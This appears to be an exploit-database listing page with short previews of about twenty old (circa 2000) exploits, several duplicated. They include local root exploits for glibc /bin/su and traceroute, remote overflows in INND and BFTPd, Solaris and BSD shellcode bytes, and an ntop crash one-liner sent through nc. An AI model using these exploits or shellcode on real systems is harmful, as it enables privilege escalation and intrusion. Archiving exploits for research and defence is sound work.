GLIBC - binsu Local Privilege Escalation

GLIBC - binsu Local Privilege Escalation / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of /bin/su program with the address of the shellcode, so, the program executes it when main returns or exit is called Thanks a lot to...

GLIBC (via /bin/su) Local Root Exploit

Exploit for linux platform in category local exploits ====================================== GLIBC via /bin/su Local Root Exploit ====================================== / Working exploit for glibc executing /bin/su To exploit this i have used a technique that overwrites the .dtors section of...

INND/NNRP < 1.6.X Remote Root Overflow Exploit

Exploit for linux platform in category remote exploits ============================================== INND/NNRP include include include define DEFAULTOFFSET 792 define BUFFERSIZE 796 define ADDRS 80 define RET 0xefbf95e4 define NOP "\x08\x21\x02\x80" int mainargc, argv int argc; char argv; char...

BFTPd vsprintf() Format Strings Exploit

Exploit for linux platform in category remote exploits ======================================= BFTPd vsprintf Format Strings Exploit ======================================= Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer...

BFTPd - &#039;vsprintf()&#039; Format Strings

/ Copyright c 2000 - Security.is The following material may be freely redistributed, provided that the code or the disclaimer have not been partly removed, altered or modified in any way. The material is the property of security.is. You are allowed to adopt the represented code in your programs,...

HP-UX 11.0 pppd Stack Buffer Overflow Exploit

Exploit for hp-ux platform in category local exploits ============================================= HP-UX 11.0 pppd Stack Buffer Overflow Exploit ============================================= / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / /...

Oracle 8.x - cmctl Buffer Overflow

/ source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied command line arguments. The string...

Oracle 8.x - cmctl Buffer Overflow

Oracle 8.x - cmctl Buffer Overflow / source: https://www.securityfocus.com/bid/1968/info cmctl is the Connection Control Manager, part of the Oracle 8i installation. A vulnerability exists that can allow elevation of privileges. The problem occurs in the way cmctl handles the user-supplied comman...

Solaris/SPARC 2.7 / 7 locale Format String Exploit

Exploit for solaris platform in category local exploits ================================================== Solaris/SPARC 2.7 / 7 locale Format String Exploit ================================================== / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on t...

HP-UX 11.0 - pppd Local Stack Buffer Overflow

HP-UX 11.0 - pppd Local Stack Buffer Overflow / Copyright c 2000 ADM / / All Rights Reserved / / THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM / / The copyright notice above does not evidence any / / actual or intended publication of such source code. / / / / Title: HP-UX pppd / / Tested...

SolarisSPARC 2.7 7 locale - Format String

SolarisSPARC 2.7 7 locale - Format String / Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine...

Solaris/SPARC 2.7 / 7 locale - Format String

/ Exploit for the locale format string vulnerability in Solaris/SPARC 2.7 / 7 Based on the exploit by Warning3 For additional information see http://www.phreedom.org/solar/localesol.txt By Solar Eclipse Assistant Editor, Phreedom Magazine http://www.phreedom.org 10 Oct 2000 / include include defi...

BSD Passive Connection Shellcode

Exploit for bsd platform in category shellcode ================================ BSD Passive Connection Shellcode ================================ ; Passive Connection Shellcode ; ; Coded by Scrippie - email protected - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades...

solaris/SPARC portbinding shellcode

Exploit for solaris/sparc platform in category shellcode =================================== solaris/SPARC portbinding shellcode =================================== / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0,...

solaris/SPARC portbinding shellcode

solaris/SPARC portbinding shellcode. Shellcode exploit for solarissparc platform / Solaris - Sparc - www.dopesquad.net / char shellcode = "\xa0\x23\xa0\x10" / sub %sp, 16, %l0 / "\xae\x23\x80\x10" / sub %sp, %l0, %l7 / "\xee\x23\xbf\xec" / st %l7, %sp - 20 / "\x82\x05\xe0\xd6" / add %l7, 214, %g1...

BSD Passive Connection Shellcode

BSD Passive Connection Shellcode. Shellcode exploit for bsd platform ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and...

traceroute Local Root Exploit

Exploit for linux platform in category local exploits ============================= traceroute Local Root Exploit ============================= / MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the...

LBL Traceroute - Local Privilege Escalation

/ MasterSecuritY openwall.c - Local root exploit in LBNL traceroute Copyright C 2000 Michel "MaXX" Kaempf Updated versions of this exploit and the corresponding advisory will be made available at: ftp://maxx.via.ecp.fr/traceroot/ This program is free software; you can redistribute it and/or modif...

Ntop -w remote exploit

Problem: ntop has a stack-based BOF when it's requested too long filename. 2. Tested Version ntop-1.2a1 I only tested this version. 3. Example 1. first run ntop -w 8080 2. run this script $ printf "GET /perl -e 'print "A"x240'rnrn" |nc localhost 8080 3. the ntop goes seg. fault. $ ntop -w 8080...

pine421.txt

/ PINE Exploit 4.21 bTm Proof of Concept: Pine 4.21 There exists a vulnerability in Pine 4.21 involving the portion of code in charge of peroidically checking email when a pine client is open. Run pine in one window, then send an email to the account owning that session. Switch back over and hit...